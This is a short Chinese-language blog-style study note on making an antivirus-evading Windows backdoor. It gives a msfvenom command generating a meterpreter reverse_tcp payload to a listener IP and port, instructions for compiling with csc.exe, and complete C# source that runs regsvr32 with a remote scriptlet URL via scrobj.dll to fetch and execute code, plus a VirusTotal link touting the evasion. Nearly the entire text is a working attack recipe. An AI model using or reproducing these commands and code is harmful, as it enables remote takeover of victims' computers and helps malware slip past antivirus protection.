引用原文??！

注：本文技術(shù)非原創(chuàng)，轉(zhuǎn)載請(qǐng)直接對(duì)原文轉(zhuǎn)載，請(qǐng)不要對(duì)本文打賞等，本文為學(xué)習(xí)筆記，禁止由本文產(chǎn)生任何盈利行為。

需要（Framework），一般Windows環(huán)境都有，
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exe

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=5555 X > shell.exe

kali下生成后門文件。直接查殺，發(fā)現(xiàn)很多報(bào)毒。
原文要求生成一個(gè)sct文件，然后放到你的web服務(wù)的目錄中，實(shí)現(xiàn)監(jiān)聽。

制作后門文件：
1、cmd必須給與管理員權(quán)限
2、cmd下，

cd C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\

C:\Windows\Microsoft.NET\Framework\v2.0.50727>csc /t:exe /out:aaa.exe regsvr32.cs

/t:exe意思是，輸出exe文件。
/out:aaa.exe意思是，輸出名字叫aaa的exe文件。
regsvr32.cs就是我們利用做免殺的c#文件。
https://github.com/pasahitz/regsvr32
regsvr32.cs這個(gè)文件需要單獨(dú)編輯

using System;
using System.Runtime.InteropServices;

namespace Regsvr

{ public class CMD
    { [DllImport("msvcrt.dll")]
        public static extern int system(string cmd);
        public static void Main()
        { system("regsvr32 /s /n /u /i:http://監(jiān)聽者IP:監(jiān)聽的端口/你剛才生成的sct文件 scrobj.dll");
        }}}

免殺后殺毒報(bào)告：https://www.virustotal.com/zh-cn/file/4f5801be2516cc8cfe4a73d00d44ca399c5bc116e9ac0d7f9f7a9aa29dca6f65/analysis/1495456458/

Malwarebytes這個(gè)殺毒軟件好強(qiáng)悍。